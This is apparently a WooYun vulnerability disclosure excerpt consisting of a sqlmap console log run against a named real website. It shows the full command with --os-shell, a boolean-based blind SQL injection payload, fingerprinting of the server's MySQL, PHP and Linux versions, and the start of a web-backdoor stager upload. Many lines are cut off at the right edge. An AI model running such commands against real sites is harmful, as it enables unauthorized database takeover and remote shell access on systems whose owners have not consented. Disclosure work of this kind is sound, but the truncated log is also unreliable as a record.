WooYun.org

D:\pyhton27\sqlmap>sqlmap.py -u "http://ala.online.sh.cn/newtousu/u
?flag=1&kind=%CA%B3%C6%B7/%D2%A9%C6%B7&searbh=&searxm=" --os-shell
    sqlmap/1.0-dev - automatic SQL injection and database takeover
    http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without
 consent is illegal. It is the end user's responsibility to obey al
local, state and federal laws. Authors assume no liability and are
le for any misuse or damage caused by this program
[*] starting at 23:01:36
[23:01:36] [INFO] resuming back-end DBMS 'mysql'
[23:01:36] [INFO] testing connection to the target url
[23:01:37] [WARNING] cannot properly display Unicode characters ins
S command prompt (http://bugs.python.org/issue1602). All unhandled
ll result in replacement with '?' character. Please, find proper ch
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0
sts:
---
Place: GET
Parameter: flag
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flag=1 AND 5238=5238&kind=??/??&searbh=&searxm=
---
[23:01:37] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 4.2.2
back-end DBMS: MySQL 3
[23:01:37] [INFO] going to use a web backdoor for command prompt
[23:01:37] [INFO] fingerprinting the back-end DBMS operating system
[23:01:37] [INFO] the back-end DBMS operating system is Linux
[23:01:37] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3